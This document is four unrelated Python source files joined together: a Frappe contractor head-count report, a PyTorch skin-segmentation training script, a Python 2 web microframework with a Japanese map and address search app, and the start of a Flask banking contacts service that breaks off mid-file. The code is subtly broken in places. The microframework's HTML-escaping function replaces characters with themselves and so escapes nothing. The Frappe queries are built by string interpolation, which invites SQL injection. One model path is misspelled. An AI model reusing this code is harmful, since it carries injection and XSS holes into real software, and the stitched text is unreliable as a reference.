frappe.response['filecontent'] = xlsx_file.getvalue()
frappe.response['type'] = 'binary'
@frappe.whitelist()
def add_header(args):
header = ["488"]
dates = get_dates(args)
for date in dates:
# frappe.log_error(message=[date,type(date)])
date = datetime.strptime(date,'%Y-%m-%d')
date = date.strftime('%d-%b-%Y')
header.extend([date,'','','',''])
header.append('OVERALL TOTAL')
return header
@frappe.whitelist()
def add_day_header(args):
day_header = ["488"]
dates = get_dates(args)
for date in dates:
date = datetime.strptime(date,'%Y-%m-%d')
day = datetime.date(date).strftime('%a')
day_header.extend([day,'','','',''])
return day_header
@frappe.whitelist()
def add_header_emp_type(args):
header = [""]
emp_type = ['plan','actual','diff','shortage','amount to be debited']
dates = get_dates(args)
for i in range(len(dates)):
header.extend(emp_type)
header.extend(emp_type)
return header
@frappe.whitelist()
def get_data(args):
data = []
contractors = frappe.get_all('Contractor',{'status':'Active'})
for contractor in contractors:
side_sum=0
side_count=0
side_diff=0
side_short=0
# side_amt=0
row = [contractor.name]
dates =get_dates(args)
for date in dates:
sum=0
if frappe.db.exists('CL Head Count Plan',{'contractor':contractor.name,'date':date}):
plan = frappe.get_doc('CL Head Count Plan',{'contractor':contractor.name,'date':date})
sum = plan.shift_1 + plan.shift_2+plan.shift_3+plan.shift_pp1+plan.shift_pp2
count = frappe.db.sql("""select count(*) as count from `tabQR Checkin`
left join `tabEmployee` on `tabQR Checkin`.employee = `tabEmployee`.name
where `tabEmployee`.contractor='%s' and `tabQR Checkin`.shift_date='%s' and ot = 0
"""%(contractor.name,date),as_dict=True)
if count:
count = count[0].count
else:
count = 0
diff = count - sum
try:
shortage = (diff /sum)*100
except ZeroDivisionError:
shortage = 0
float_value = math.floor(shortage)
short_percent = str(float_value)+'%'
amt_debt = diff * 488
row.append(sum)
row.append(count)
row.append(diff)
row.append(short_percent)
row.append(amt_debt)
side_sum+=sum
side_count+=count
side_diff = side_sum-side_count
try:
shortage = (side_diff/side_sum)*100
except ZeroDivisionError:
shortage = 0
side_short+=shortage
float_value = math.floor(side_short)
short_percent = str(float_value)+'%'
amount_debt = side_diff * 488
# side_amt+=amount_debt
row.append(side_sum)
row.append(side_count)
row.append(side_diff)
row.append(short_percent)
row.append(amount_debt)
data.append(row)
tot = total(args)
data.append(tot)
return data
def get_dates(args):
no_of_days = date_diff(add_days(args.to_date, 1), args.from_date)
dates = [add_days(args.from_date, i) for i in range(0, no_of_days)]
return dates
def total(args):
data = ['TOTAL',]
dates = get_dates(args)
contractors_list = []
contractors = frappe.get_all('Contractor',{'status':'Active'})
for c in contractors:
contractors_list.append(c.name)
row = []
for date in dates:
plan_total = 0
actual_total =0
diff=0
short =0
amount_debt=0
if frappe.db.exists('CL Head Count Plan',{'contractor':('in',contractors_list),'date':date}):
plans = frappe.get_all('CL Head Count Plan',{'contractor':('in',contractors_list),'date':date})
for p in plans:
shift_1 = 0
shift_2 = 0
shift_3 = 0
shift_pp1 = 0
shift_pp2 = 0
plan = frappe.get_doc("CL Head Count Plan",p.name)
if plan.shift_1:
shift_1 = plan.shift_1
if plan.shift_2:
shift_2 = plan.shift_2
if plan.shift_3:
shift_3 = plan.shift_3
if plan.shift_pp1:
shift_pp1 = plan.shift_pp1
if plan.shift_pp2:
shift_pp2 = plan.shift_pp2
plan_total += shift_1 + shift_2 + shift_3 + shift_pp1 + shift_pp2
row.append(plan_total)
count = frappe.db.sql("""select count(*) as count from `tabQR Checkin`
left join `tabEmployee` on `tabQR Checkin`.employee = `tabEmployee`.name
where `tabEmployee`.contractor in %s and `tabQR Checkin`.shift_date='%s' and ot = 0
"""%(tuple(contractors_list),date),as_dict=True)
if count:
count = count[0].count
else:
count = 0
actual_total+= count
row.append(actual_total)
diff_value =plan_total-actual_total
diff+=diff_value
row.append(diff)
try:
shortage = (diff /actual_total)*100
except ZeroDivisionError:
shortage = 0
float_value = math.floor(shortage)
short_percent = str(float_value)+'%'
row.append(short_percent)
amt_debt = diff_value*488
amount_debt+=amt_debt
row.append(amount_debt)
data.extend(row)
return data
|
<gh_stars>0
#!/usr/bin/env python
# <NAME>
# 3-Jul-2020 16:01
import os
import sys
import re
from os import listdir
import shutil
import glob
from PIL import Image
import imageio
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchsummary import summary
import torch.utils.data as data_utils
from matplotlib import pyplot as plt
import numpy as np
import pandas as pd
import subprocess
import pdb
def resize_imgs(img_dir):
# create img_dir/ori
img_dir_ori = f"{img_dir}/ori"
if not os.path.isdir(img_dir_ori):
os.mkdir(img_dir_ori)
# resize img and move the original to img_dir/ori
imgFLs = [f for f in glob.glob(f"{img_dir}/*") if re.search('(jpg|png|jpeg)',f, flags=re.IGNORECASE) ]
i = 0
for imgFL in imgFLs:
i = i+1
img = Image.open(imgFL)
img_new = img.resize((150,150))
try:
shutil.move(imgFL, f"{img_dir_ori}")
except:
# the original imgFL is already save in img_dir_ori
os.remove(imgFL)
newFL = os.path.splitext(imgFL)[0] + '.jpg'
try:
img_new.save(newFL)
except:
print(f"Error: cannot save {imgFL}")
print(f"Resized imgs under: {img_dir}/xx.jpg")
resize_imgs('Dataset/train/nonSkinPhoto')
resize_imgs('Dataset/train/SkinPhoto')
resize_imgs('Dataset/validation/neg')
resize_imgs('Dataset/validation/pos')
resize_imgs('Dataset/test/neg')
resize_imgs('Dataset/test/pos')
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.bn0 = nn.BatchNorm2d(3)
self.conv1 = nn.Conv2d(3, 32, (1,1), stride = 1)
self.bn1 = nn.BatchNorm2d(32)
self.conv2 = nn.Conv2d(32,1, (1,1), stride = 1)
self.sigmoid = nn.Sigmoid()
def forward(self,x):
x = self.conv1(x)
x = F.elu(x)
#x = self.bn1(x) #used to make relu stable
#x = F.relu(x) # relu without bn1 does not work well: tends to generate too many black (0,0,0) pixels
x = self.conv2(x)
y = self.sigmoid(x)
return y
net = Net()
summary(net, input_size=(3, 150, 150))
def get_Flnames(img_dir_pos, img_dir_neg):
# return
# 1. a list of image files (path + names)
# 2. labels
imgFLs_pos = [f"{img_dir_pos}/{f}" for f in os.listdir(img_dir_pos) if re.search('.+.jpg',f)]
imgFLs_neg = [f"{img_dir_neg}/{f}" for f in os.listdir(img_dir_neg) if re.search('.+.jpg',f)]
imgFLs = imgFLs_pos + imgFLs_neg
num_pos = len(imgFLs_pos)
num_neg = len(imgFLs_neg)
labels = [1] * num_pos + [0] * num_neg
print(f"\n{num_pos} positive imgs read from {img_dir_pos}")
print(f"{num_neg} negtive imgs read from {img_dir_neg}\n")
return imgFLs, labels
class myDataset(data_utils.Dataset):
def __init__(self, imgFLs, labels):
self.imgFLs = imgFLs
self.labels = labels
def __len__(self):
return len(self.imgFLs)
def __getitem__(self, idx):
img_name = self.imgFLs[idx]
label = self.labels[idx]
#print(f"Reading --> idx: {idx}, img_name: {img_name}, label: {label}")
image = imageio.imread(img_name)
image = torch.Tensor(image).permute([2,0,1])
image = image/255
return image, label
def train_one_epo(net, data_loader):
net.train()
losses = []
for x, targets in data_loader:
optimizer.zero_grad()
y = net(x)
criterion = nn.BCELoss()
loss = criterion(torch.mean(y,dim=[1,2,3]), targets.to(torch.float))
loss.backward()
losses.append(loss)
optimizer.step()
loss_ave = sum(losses)/len(losses)
return net, loss_ave
def evaluate(net, data_loader):
net.eval()
losses = []
with torch.no_grad():
for x, targets in data_loader:
y = net(x)
criterion = nn.BCELoss()
loss = criterion(torch.mean(y,dim=[1,2,3]), targets.to(torch.float))
losses.append(loss)
loss_ave = sum(losses)/len(losses)
return loss_ave
def prepare_dataset(img_dir_pos, img_dir_neg, batch_size):
imgFLs, labels = get_Flnames(img_dir_pos, img_dir_neg)
train_dataset = myDataset(imgFLs , labels )
index = list(range(train_dataset.__len__()))
data_loader = data_utils.DataLoader(train_dataset, batch_size=batch_size,
shuffle=True, num_workers=2)
return data_loader
def train(net, epoches, data_loader_train, data_loader_eval):
losses_train = torch.Tensor(epoches)
losses_eval = torch.Tensor(epoches)
for epoch in range(epoches):
mini_batch = 0
net, loss_train = train_one_epo(net, data_loader_train)
loss_eval = evaluate(net, data_loader_eval)
print(f"epoch = {epoch}, loss_train = {loss_train:.4f}, loss_eval = {loss_eval:.4f}")
losses_train[epoch] = loss_train
losses_eval[epoch] = loss_eval
#-- save model
if not os.path.isdir('networks'): os.mkdir('networks')
modelFL = f"networks/model_epo{epoch}.pt"
torch.save(net.state_dict(), modelFL)
print(f"--> One epoch finished. Modeled saved: {modelFL}")
if epoch % 1 == 0:
if not os.path.isdir("pred_imgs"): os.mkdir("pred_imgs")
outputFL = f"pred_imgs/eval_{epoch}.png"
visual_check(modelFL, 'Dataset/validation/pos/' , outputFL)
outputFL = f"pred_imgs/train_{epoch}.png"
visual_check(modelFL, 'Dataset/train/SkinPhoto/' , outputFL)
return net, losses_train, losses_eval
def plot_loss(losses_train, losses_eval):
# save as torch file
torch.save(losses_train, "losses_train.pt")
torch.save(losses_eval, "losses_eval.pt")
# save as tsv file
losses = torch.stack( (losses_train, losses_eval), dim = 1).detach().numpy()
losses = pd.DataFrame(losses, columns = ['train', 'eval'])
losses.to_csv('losses.tsv', sep = '\t', index = False)
print(f"losses.tsv generated.")
# generate plots
subprocess.check_call(['Rscript', 'plot_losses.R', 'losses.tsv'])
def black_white(im_new, cutoff = 0.5):
#- convert image (original range 0-1) to black and white
idx1 = im_new < cutoff
idx2 = im_new >= cutoff
im_new[idx1] = 0
im_new[idx2] = 1
return im_new
def visual_check(networkFL, img_dir, outputFL):
# save predicted images into png files
net = Net()
net.load_state_dict(torch.load(networkFL))
# visually check the valiation set
net.eval()
imgFLs = [f"{img_dir}/{f}" for f in os.listdir(img_dir) if os.path.isfile(f"{img_dir}/{f}")]
n_imgs = len(imgFLs)
print(f"There are {n_imgs} images under {img_dir}")
with torch.no_grad():
images = torch.Tensor().to(torch.uint8)
for i in range(len(imgFLs)):
im = imageio.imread(imgFLs[i])
im_new = net(torch.Tensor(im).unsqueeze(0).permute(0,3,1,2))
im_new = (im_new*255).squeeze().to(torch.uint8)
#--
im_new = torch.stack((im_new, im_new, im_new), dim = 2) #im_new.shape = [150, 150] -> im_new.shape = [150, 150, 3]
im = torch.Tensor(im).to(torch.uint8)
this_im = torch.cat((im, im_new), dim = 1) # put the original image and pred image side-by-side
images = torch.cat((images, this_im), dim = 0)
# save into file
imageio.imsave(outputFL,images.to(torch.uint8).numpy())
print(f"{outputFL} generated.")
#-- train and evaluate
data_loader_train = prepare_dataset(img_dir_pos = 'Dataset/train/SkinPhoto',
img_dir_neg = 'Dataset/train/nonSkinPhoto', batch_size = 5)
data_loader_eval = prepare_dataset(img_dir_pos = 'Dataset/validation/pos',
img_dir_neg = 'Dataset/validation/neg', batch_size = 20)
net = Net()
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(f"device: {device}")
net.to(device)
#net.load_state_dict(torch.load('networks/old/model_epo299.pt'))
optimizer = torch.optim.Adam(net.parameters())
epoches = 50
net, losses_train, losses_eval = train(net,epoches, data_loader_train, data_loader_eval)
plot_loss(losses_train, losses_eval)
#- the model with lowest eval loss (the loss does not make much sense here ...)
loss_min , idx = torch.min(losses_eval, 0)
networkFL = f'neworks/model_epo{idx}.pt'
print(f"Model with the lowest eval loss: {networkFL}, epoch = {idx}, and loss_eval = {loss_min:4f}")
sys.exit()
# networkFL = 'networks/model_epo11.pt'
# outputFL = f"pred_imgs/test_{11}.png"
# visual_check(networkFL, 'Dataset/test/pos/' , outputFL)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
##
## Whabapp - A Web application microframework
##
## usage: $ python app.py -s localhost 8080
##
import sys
import re
import cgi
import os.path
import sqlite3
# quote HTML metacharacters.
def q(s):
assert isinstance(s, basestring), s
return (s.
replace('&','&').
replace('>','>').
replace('<','<').
replace('"','"').
replace("'",'''))
# encode as a URL.
URLENC = re.compile(r'[^a-zA-Z0-9_.-]')
def urlenc(url, codec='utf-8'):
def f(m):
return '%%%02X' % ord(m.group(0))
return URLENC.sub(f, url.encode(codec))
# remove redundant spaces.
RMSP = re.compile(r'\s+', re.U)
def rmsp(s):
return RMSP.sub(' ', s.strip())
# merge two dictionaries.
def mergedict(d1, d2):
d1 = d1.copy()
d1.update(d2)
return d1
# iterable
def iterable(obj):
return hasattr(obj, '__iter__')
# closable
def closable(obj):
return hasattr(obj, 'close')
## Template
##
class Template(object):
debug = 0
def __init__(self, *args, **kwargs):
if '_copyfrom' in kwargs:
_copyfrom = kwargs['_copyfrom']
objs = _copyfrom.objs
kwargs = mergedict(_copyfrom.kwargs, kwargs)
else:
objs = []
for line in args:
i0 = 0
for m in self._VARIABLE.finditer(line):
objs.append(line[i0:m.start(0)])
x = m.group(1)
if x == '$':
objs.append(x)
else:
objs.append(self.Variable(x[0], x[1:-1]))
i0 = m.end(0)
objs.append(line[i0:])
self.objs = objs
self.kwargs = kwargs
return
def __call__(self, **kwargs):
return self.__class__(_copyfrom=self, **kwargs)
def __iter__(self):
return self.render()
def __repr__(self):
return '<Template %r>' % self.objs
def __str__(self):
return ''.join(self)
@classmethod
def load(klass, lines, **kwargs):
template = klass(*lines, **kwargs)
if closable(lines):
lines.close()
return template
def render(self, codec='utf-8', **kwargs):
kwargs = mergedict(self.kwargs, kwargs)
def render1(value, quote=False):
if value is None:
pass
elif isinstance(value, Template):
if quote:
if 2 <= self.debug:
raise ValueError
elif self.debug:
yield '[ERROR: Template in a quoted context]'
else:
for x in value.render(codec=codec, **kwargs):
yield x
elif isinstance(value, dict):
if 2 <= self.debug:
raise ValueError
elif self.debug:
yield '[ERROR: Dictionary included]'
elif isinstance(value, basestring):
if quote:
yield q(value)
else:
yield value
elif callable(value):
for x in render1(value(**kwargs), quote=quote):
yield x
elif iterable(value):
for obj1 in value:
for x in render1(obj1, quote=quote):
yield x
else:
if quote:
yield q(unicode(value))
else:
if 2 <= self.debug:
raise ValueError
elif self.debug:
yield '[ERROR: Non-string object in a non-quoted context]'
return
for obj in self.objs:
if isinstance(obj, self.Variable):
k = obj.name
if k in kwargs:
value = kwargs[k]
elif k in self.kwargs:
value = self.kwargs[k]
else:
yield '[notfound:%s]' % k
continue
if obj.type == '(':
for x in render1(value, quote=True):
yield x
continue
elif obj.type == '[':
yield urlenc(value)
continue
else:
value = obj
for x in render1(value):
yield x
return
_VARIABLE = re.compile(r'\$(\(\w+\)|\[\w+\]|<\w+>)')
class Variable(object):
def __init__(self, type, name):
self.type = type
self.name = name
return
def __repr__(self):
if self.type == '(':
return '$(%s)' % self.name
elif self.type == '[':
return '$[%s]' % self.name
else:
return '$<%s>' % self.name
## Router
##
class Router(object):
def __init__(self, method, regex, func):
self.method = method
self.regex = regex
self.func = func
return
@staticmethod
def make_wrapper(method, pat):
regex = re.compile('^'+pat+'$')
def wrapper(func):
return Router(method, regex, func)
return wrapper
def GET(pat): return Router.make_wrapper('GET', pat)
def POST(pat): return Router.make_wrapper('POST', pat)
## Response
##
class Response(object):
def __init__(self, status='200 OK', content_type='text/html; charset=utf-8', **kwargs):
self.status = status
self.headers = [('Content-Type', content_type)]+kwargs.items()
return
def add_header(self, k, v):
self.headers.append((k, v))
return
class Redirect(Response):
def __init__(self, location):
Response.__init__(self, '302 Found', Location=location)
return
class NotFound(Response):
def __init__(self):
Response.__init__(self, '404 Not Found')
return
class InternalError(Response):
def __init__(self):
Response.__init__(self, '500 Internal Server Error')
return
## WebApp
##
class WebApp(object):
debug = 0
codec = 'utf-8'
def run(self, environ, start_response):
method = environ.get('REQUEST_METHOD', 'GET')
path = environ.get('PATH_INFO', '/')
fp = environ.get('wsgi.input')
fields = cgi.FieldStorage(fp=fp, environ=environ)
result = None
for attr in dir(self):
router = getattr(self, attr)
if not isinstance(router, Router): continue
if router.method != method: continue
m = router.regex.match(path)
if m is None: continue
params = m.groupdict().copy()
params['_path'] = path
params['_fields'] = fields
params['_environ'] = environ
code = router.func.func_code
args = code.co_varnames[:code.co_argcount]
kwargs = {}
for k in args[1:]:
if k in fields:
kwargs[k] = fields.getvalue(k)
elif k in params:
kwargs[k] = params[k]
try:
result = router.func(self, **kwargs)
except TypeError:
if 2 <= self.debug:
raise
elif self.debug:
result = [InternalError()]
break
if result is None:
result = self.get_default(path, fields, environ)
def f(obj):
if isinstance(obj, Response):
start_response(obj.status, obj.headers)
elif isinstance(obj, Template):
for x in obj.render(codec=self.codec):
if isinstance(x, unicode):
x = x.encode(self.codec)
yield x
elif iterable(obj):
for x in obj:
for y in f(x):
yield y
else:
if isinstance(obj, unicode):
obj = obj.encode(self.codec)
yield obj
return f(result)
def get_default(self, path, fields, environ):
return [NotFound(), '<html><body>not found</body></html>']
# run_server
def run_server(host, port, app):
from wsgiref.simple_server import make_server
print >>sys.stderr, 'Serving on %r port %d...' % (host, port)
httpd = make_server(host, port, app.run)
httpd.serve_forever()
# run_cgi
def run_cgi(app):
from wsgiref.handlers import CGIHandler
CGIHandler().run(app.run)
# run_httpcgi: for cgi-httpd
def run_httpcgi(app):
from wsgiref.handlers import CGIHandler
class HTTPCGIHandler(CGIHandler):
def start_response(self, status, headers, exc_info=None):
protocol = self.environ.get('SERVER_PROTOCOL', 'HTTP/1.0')
sys.stdout.write('%s %s\r\n' % (protocol, status))
return CGIHandler.start_response(self, status, headers, exc_info=exc_info)
HTTPCGIHandler().run(app.run)
# main
def main(app, argv):
import getopt
def usage():
print 'usage: %s [-d] [-s] [host [port]]' % argv[0]
return 100
try:
(opts, args) = getopt.getopt(argv[1:], 'ds')
except getopt.GetoptError:
return usage()
server = False
debug = 0
for (k, v) in opts:
if k == '-d': debug += 1
elif k == '-s': server = True
Template.debug = debug
WebApp.debug = debug
if server:
host = ''
port = 8080
if args:
host = args.pop(0)
if args:
port = int(args.pop(0))
run_server(host, port, app)
else:
run_httpcgi(app)
return
## VMap
##
import addrdict
import search_addr
import search_entity
def get_region_name(rgncode):
from addrdict import PREF, REGION
pref = PREF[rgncode/1000]
region = REGION[rgncode]
return pref+' '+region
def get_type(props):
if props is None:
return u''
elif props == 'highway=bus_stop':
return u'(バス停)'
elif props == 'highway=traffic_signals':
return u'(信号)'
elif props == 'railway=station':
return u'(駅)'
elif props.startswith('railway='):
return u'(線路)'
elif props.startswith('highway='):
return u'(道路)'
elif props.startswith('way='):
return u'(敷地その他)'
else:
return u''
def get_dir(vx, vy):
if abs(vx) < abs(vy)*0.4:
if 0 < vy:
return u'北'
else:
return u'南'
elif abs(vy) < abs(vx)*0.4:
if 0 < vx:
return u'東'
else:
return u'西'
elif 0 < vx:
if 0 < vy:
return u'北東'
else:
return u'南東'
else:
if 0 < vy:
return u'北西'
else:
return u'南西'
class VMap(WebApp):
DBPATH = './db/'
HEADER = '''<!DOCTYPE html>
<html>
<head><title>vmap</title></head>
<body>
'''
FOOTER = '''<p>
<address>powered by Vmap</address>
</body>
</html>
'''
def __init__(self):
self.osm_db = sqlite3.connect(os.path.join(self.DBPATH, 'osm.db'))
self.addr_db = sqlite3.connect(os.path.join(self.DBPATH, 'addr.db'))
return
@GET('/')
def index(self, s=u''):
yield Response()
yield self.HEADER
s = rmsp(s.decode(self.codec))
yield Template(
u'<h1>vmap</h1>\n'
u'<form method=GET action="/addr">\n'
u'住所または郵便番号を入力してください:<br>'
u'<input name=s size=50 value="$(s)">\n'
u'<input name=cmd type=submit value="検索">\n'
u'</form>\n', s=s)
yield self.FOOTER
return
@GET('/addr')
def hello(self, s):
from search_addr import search, AddrNotFound, NoRegion, NoWord
yield Response()
yield self.HEADER
cur = self.addr_db.cursor()
s = rmsp(s.decode(self.codec))
yield Template(u'<h1>「$(s)」の検索結果</h1>', s=s)
aids = []
error = None
for r in search(cur, s):
if r is None: continue
if isinstance(r, AddrNotFound):
error = r
continue
aids.extend(r)
if not aids:
if isinstance(error, NoRegion):
yield Template(u'<p> エラー: 市町村を入力してください。\n')
elif isinstance(error, NoWord):
yield Template(u'<p> エラー: 市町村以下の住所を入力してください。\n')
else:
yield Template(u'<p> 該当する住所が見つかりませんでした。\n')
else:
yield Template(u'<p> $(n)件の住所が見つかりました。\n', n=len(aids))
yield '<ul>\n'
for aid in aids:
cur.execute('SELECT rgncode,name,postal,lat,lng FROM address WHERE aid=?;',
(aid,))
for (rgncode,name,postal,lat,lng) in cur:
yield Template(
u'<li> <a href="/search?p=$[lat],$[lng]">'
u'〒$(postal) $(region) $(name)</a>\n',
postal=(postal[:3]+'-'+postal[3:]),
region=get_region_name(rgncode), name=name,
lat=str(lat), lng=str(lng))
yield '</ul>\n'
yield self.FOOTER
return
@GET('/search')
def search(self, p, s=u''):
from search_entity import search, getdist
try:
(lat0,_,lng0) = p.partition(',')
lat0 = float(lat0)
lng0 = float(lng0)
loc0 = (lat0, lng0)
except ValueError:
yield InternalError()
return
yield Response()
yield self.HEADER
addr = self.addr_db.cursor()
radius = 0.011
maxresults = 50
R = 0.011
DELTA = 0.005
loc = u'座標 %.3f,%.3f' % (lat0,lng0)
addr.execute('SELECT aid,lat,lng FROM point WHERE '
'?<=lat and ?<=lng and lat<=? and lng<=?;',
(lat0-R,lng0-R, lat0+R,lng0+R))
pts = list(addr)
if pts:
pts.sort(key=lambda (aid,lat1,lng1): getdist(loc0,(lat1,lng1)))
(aid,_,_) = pts[0]
addr.execute('SELECT rgncode,name FROM address WHERE aid=?;', (aid,))
for (rgncode,name) in addr:
loc = u'%s %s付近' % (get_region_name(rgncode), name)
yield Template(u'<h1>$(loc)</h1>\n', loc=loc)
yield Template(
u'<div><form method=GET action="/search">\n'
u'キーワード: '
u'<input name=s size=50 value="$(s)">\n'
u'<input name=p type=hidden value="$(p)">\n'
u'<input name=cmd type=submit value="絞り込み検索">\n'
u'</form></div>\n',
s=s, p=p)
yield Template(
u'<div>'
u'<a href="/">住所入力に戻る</a> \n'
u'<a href="/search?p=$(lat0),$(lnge)">[東へ移動]</a> \n'
u'<a href="/search?p=$(lat0),$(lngw)">[西へ移動]</a> \n'
u'<a href="/search?p=$(lats),$(lng0)">[南へ移動]</a> \n'
u'<a href="/search?p=$(latn),$(lng0)">[北へ移動]</a> \n'
u'</div>',
lat0=lat0, lng0=lng0,
lnge=lng0+DELTA, lngw=lng0-DELTA,
latn=lat0+DELTA, lats=lat0-DELTA)
kwds = []
if s:
s = rmsp(s.decode(self.codec))
if s:
kwds = s.split(' ')
radius *= 5
node = self.osm_db.cursor()
point = self.osm_db.cursor()
entity = self.osm_db.cursor()
objs = list(search(node, point, entity, lat0, lng0, kwds, radius=radius))
if objs:
objs.sort(key=lambda (nid,lat1,lng1,name,props): getdist(loc0,(lat1,lng1)))
if maxresults < len(objs):
yield Template(u'<p> $(n)件中、最初の$(maxresults)件を表示しています。',
n=len(objs), maxresults=maxresults)
objs = objs[:maxresults]
else:
yield Template(u'<p> $(n)件を表示しています。', n=len(objs))
yield '<ul>\n'
for (nid,lat1,lng1,name,props) in objs:
dist = '%.1f' % getdist(loc0,(lat1,lng1))
d = get_dir(lng1-lng0, lat1-lat0)
yield Template(
u'<li> $(name) $(t) $(d)$(dist)km '
u'<a href="?p=$(lat),$(lng)">[ここに移動]</a>\n',
name=name, t=get_type(props), d=d, dist=dist,
lat=lat1, lng=lng1)
yield '</ul>\n'
else:
yield Template(u'<p> 該当する建物・場所が見つかりませんでした。\n')
yield Template(
u'<div><form method=GET action="/search">\n'
u'キーワード: '
u'<input name=s size=50 value="$(s)">\n'
u'<input name=p type=hidden value="$(p)">\n'
u'<input name=cmd type=submit value="絞り込み検索">\n'
u'</form></div>\n',
s=s, p=p)
yield Template(
u'<div>'
u'<a href="/">住所入力に戻る</a> \n'
u'<a href="/search?p=$(lat0),$(lnge)">[東へ移動]</a> \n'
u'<a href="/search?p=$(lat0),$(lngw)">[西へ移動]</a> \n'
u'<a href="/search?p=$(lats),$(lng0)">[南へ移動]</a> \n'
u'<a href="/search?p=$(latn),$(lng0)">[北へ移動]</a> \n'
u'</div>',
lat0=lat0, lng0=lng0,
lnge=lng0+DELTA, lngw=lng0-DELTA,
latn=lat0+DELTA, lats=lat0-DELTA)
yield self.FOOTER
return
if __name__ == '__main__': sys.exit(main(VMap(), sys.argv))
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Web service for handling linked user contacts.
Manages internal user contacts and external accounts.
"""
import atexit
import logging
import os
import re
import sys
import jwt
from flask import Flask, jsonify, request
import bleach
from sqlalchemy.exc import OperationalError, SQLAlchemyError
from db import ContactsDb
from opentelemetry import trace
from opentelemetry.sdk.trace.export import BatchExportSpanProcessor
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.propagators import set_global_textmap
from opentelemetry.exporter.cloud_trace import CloudTraceSpanExporter
from opentelemetry.tools.cloud_trace_propagator import CloudTraceFormatPropagator
from opentelemetry.instrumentation.flask import FlaskInstrumentor
def create_app():
"""Flask application factory to create instances
of the Contact Service Flask App
"""
app = Flask(__name__)
# Disabling unused-variable for lines with route decorated functions
# as pylint thinks they are unused
# pylint: disable=unused-variable
@app.route("/version", methods=["GET"])
def version():
"""
Service version endpoint
"""
return app.config["VERSION"], 200
@app.route("/ready", methods=["GET"])
def ready():
"""Readiness probe."""
return "ok", 200
@app.route("/contacts/<username>", methods=["GET"])
def get_contacts(username):
"""Retrieve the contacts list for the authenticated user.
This list is used for populating Payment and Deposit fields.
Return: a list of contacts
"""
auth_header = request.headers.get("Authorization")
if auth_header:
token = auth_header.split(" ")[-1]
else:
token = ""
try:
auth_payload = jwt.decode(
token, key=app.config["PUBLIC_KEY"], algorithms="RS256"
)
if username != auth_payload["user"]:
raise PermissionError
contacts_list = contacts_db.get_contacts(username)
app.logger.debug("Succesfully retrieved contacts.")
return jsonify(contacts_list), 200
except (PermissionError, jwt.exceptions.InvalidTokenError) as err:
app.logger.error("Error retrieving contacts list: %s", str(err))
return "authentication denied", 401
except SQLAlchemyError as err:
app.logger.error("Error retrieving contacts list: %s", str(err))
return "failed to retrieve contacts list", 500
@app.route("/contacts/<username>", methods=["POST"])
def add_contact(username):
"""Add a new favorite account to user's contacts list
Fails if account or routing number are invalid
or if label is not alphanumeric
request fields:
- account_num
- routing_num
- label
- is_external
"""
auth_header = request.headers.get("Authorization")
if auth_header:
token = auth_header.split(" ")[-1]
else:
token = ""
try:
auth_payload = jwt.decode(
token, key=app.config["PUBLIC_KEY"], algorithms="RS256"
)
if username != auth_payload["user"]:
raise PermissionError
req = {
k: (bleach.clean(v) if isinstance(v, str) else v)
for k, v in request.get_json().items()
}
_validate_new_contact(req)
_check_contact_allowed(username, auth_payload["acct"], req)
# Create contact data to be added to the database.
contact_data = {
"username": username,
"label": req["label"],
"account_num": req["account_num"],
"routing_num": req["routing_num"],
"is_external": req["is_external"],
}
# Add contact_data to database
app.logger.debug("Adding new contact to the database.")
contacts_db.add_contact(contact_data)
app.logger.info("Successfully added new contact.")
return jsonify({}), 201
except (PermissionError, jwt.exceptions.InvalidTokenError) as err:
app.logger.error("Error adding contact: %s", str(err))
return "authentication denied", 401
except UserWarning as warn:
app.logger.error("Error adding contact: %s", str(warn))
return str(warn), 400
except ValueError as err:
app.logger.error("Error adding contact: %s", str(err))
return str(err), 409
except SQLAlchemyError as err:
app.logger.error("Error adding contact: %s", str(err))
return "failed to add contact", 500
def _validate_new_contact(req):
"""Check that this new contact request has valid fields"""
app.logger.debug("validating add contact request: %s", str(req))
# Check if required fields are filled
fields = ("label", "account_num", "routing_num", "is_external")
if any(f not in req for f in fields):
raise UserWarning("missing required field(s)")
# Validate account number (must be 10 digits)
if req["account_num"] is None or not re.match(r"\A[0-9]{10}\Z", req["account_num"]):
raise UserWarning("invalid account number")
# Validate routing number (must be 9 digits)
if req["routing_num"] is None or not re.match(r"\A[0-9]{9}\Z", req["routing_num"]):
raise UserWarning("invalid routing number")
# Only allow external accounts to deposit
if (req["is_external"] and req["routing_num"] == app.config["LOCAL_ROUTING"]):
raise UserWarning("invalid routing number")
# Validate label
# Must be >0 and <=30 chars, alphanumeric and spaces, can't start with space
if req["label"] is None or not re.match(r"^[0-9a-zA-Z][0-9a-zA-Z ]{0,29}$", req["label"]):
raise UserWarning("invalid account label")
def _check_contact_allowed(username, accountid, req):
"""Check that this contact is allowed to be created"""
app.logger.debug("checking that this contact is allowed to be created: %s", str(req))
# Don't allow self reference
if (req["account_num"] == accountid and req["routing_num"] == app.config["LOCAL_ROUTING"]):
raise ValueError("may not add yourself to contacts")
# Don't allow identical contacts
for contact in contacts_db.get_contacts(username):
if (contact["account_num"] == req["account_num"]
and contact["routing_num"] == req["routing_num"]):
raise ValueError("account already exists as a contact")
if contact["label"] == req["label"]:
raise ValueError("contact already exists with that label")
@atexit.register
def _shutdown():
"""Executed when web app is terminated."""
app.logger.info("Stopping contacts service.")
# set up logger
app.logger.handlers = logging.getLogger("gunicorn.error").handlers
app.logger.setLevel(logging.getLogger("gunicorn.error").level)
app.logger.info("Starting contacts service.")
# Set up tracing and export spans to Cloud Trace.
if os.environ['ENABLE_TRACING'] == "true":
app.logger.info("✅ Tracing enabled.")
# Set up tracing and export spans to Cloud Trace
trace.set_tracer_provider(TracerProvider())
cloud_trace_exporter = CloudTraceSpanExporter()
trace.get_tracer_provider().add_span_processor(
BatchExportSpanProcessor(cloud_trace_exporter)
)
set_global_textmap(CloudTraceFormatPropagator())
FlaskInstrumentor().instrument_app(app)
else:
app.logger.info("🚫 Tracing disabled.")
# setup global variables
